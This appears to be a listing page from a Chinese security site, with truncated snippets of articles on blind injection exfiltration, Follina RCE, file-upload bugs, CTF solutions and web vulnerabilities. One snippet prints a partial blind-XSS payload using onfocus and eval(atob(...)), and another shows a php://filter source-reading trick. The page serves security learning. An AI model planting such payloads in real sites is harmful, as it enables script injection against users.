http - 第 31 | CN-SEC 中文网

安全文章

命令执行/SQL盲注无回显外带方式

声明：该公众号大部分文章来自作者日常学习笔记，也有部分文章是经过作者授权和其他公众号白名单转载，未经授权，严禁转载，如需转载，联系开白。请勿利用文章内的相关技术从事非法测试，如因此产生的一切不良后果与...

06月07日90 views评论

阅读全文

安全文章

Blind XSS

Payload："><input onfocus=eval(atob(http://this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCg...

06月07日26 views评论

阅读全文

安全工具

神兵利器——红队知识仓库（建议收藏）

网站导航编码/加密CyberChef：编解码及加密，可本地部署 https://github.com/gchq/CyberChefOK Tools在线工具：https://github.com/wan...

06月07日73 views评论

阅读全文

安全文章

OSCP难度靶机之WEB DEVELOPER: 1

虚拟机信息：虚拟机下载地址：https://www.vulnhub.com/entry/web-developer-1,288/虚拟机简介：获得 root 访问权限目标：1个flag级别：中级1、信息...

06月07日57 views评论

阅读全文

安全文章

渗透测试一些知识点

1、如果提示缺少参数，如{msg：params error}，可尝使用字典模糊测试构造参数，进一步攻击。2、程序溢出，int最大值为2147483647，可尝试使用该值进行整数溢出，观察现象。3、40...

06月07日49 views评论

阅读全文

安全文章

CVE-2022-30190 Follina Office RCE分析【附自定义word模板POC】

免责声明本文仅用于技术讨论与学习，利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任。只供对已授权的目标使用测试，对未授权目标的测试作者不承担责任...

06月06日229 views评论

阅读全文

安全文章

老洞复现+分析 | ShowDoc<2.8.3 前台文件上传

0x00 前言本文为开普勒版upload-labs靶场的第22关，使用的php版本为7.3。关于小黑刷upload-labs靶场的全系列：1、《上传靶场upload-labs搭建及使用》2、《uplo...

06月06日1,420 views评论

阅读全文

安全百科

WEB安全梳理-请求伪造漏洞

"当你生活不顺心的时候，不要慌。看看你的钱包和存款，哭出来就好了。"导读以前做的...

06月06日31 views评论

阅读全文

安全文章

WEB安全梳理-会话管理漏洞

"趁觉得好看的时候多照照镜子，毕竟这种错觉不是每天都有的。"导读以前做的一个简单...

06月06日172 views评论

阅读全文

IoT工控物联网

IoT设备的PUT文件上传漏洞 - 后续

上周忙着打比赛去了，没能及时回复@ybdt，实在抱歉。不过这个漏洞是Xray扫出来的，具体什么型号还不能说，请谅解。漏洞原理很简单，Lighttpd配置不当。错误的配置WebDAV导致存在PUT文件上...

06月06日142 views评论

阅读全文

CTF专场

BUUCTF[羊城杯 2020]Easyphp2-解题步骤详解

进入后的页面根据题目提示我们可以知道这是一道PHP代码审计的题所以使用伪协议查看源代码,这里使用的是两次url编码绕过/?file=php://filter/read=convert.quoted-p...

06月06日363 views评论

阅读全文

安全文章

WEB安全梳理-访问控制漏洞

"你之所以觉得时间一年比一年过得快，是因为时间对你一年比一年重要。"导读 &nbs...

06月05日84 views评论

阅读全文

命令执行/SQL盲注无回显外带方式

Blind XSS

神兵利器——红队知识仓库（建议收藏）

OSCP难度靶机之WEB DEVELOPER: 1

渗透测试一些知识点

CVE-2022-30190 Follina Office RCE分析【附自定义word模板POC】

老洞复现+分析 | ShowDoc<2.8.3 前台文件上传

WEB安全梳理-请求伪造漏洞

WEB安全梳理-会话管理漏洞

IoT设备的PUT文件上传漏洞 - 后续

BUUCTF[羊城杯 2020]Easyphp2-解题步骤详解

WEB安全梳理-访问控制漏洞

在线咨询

微信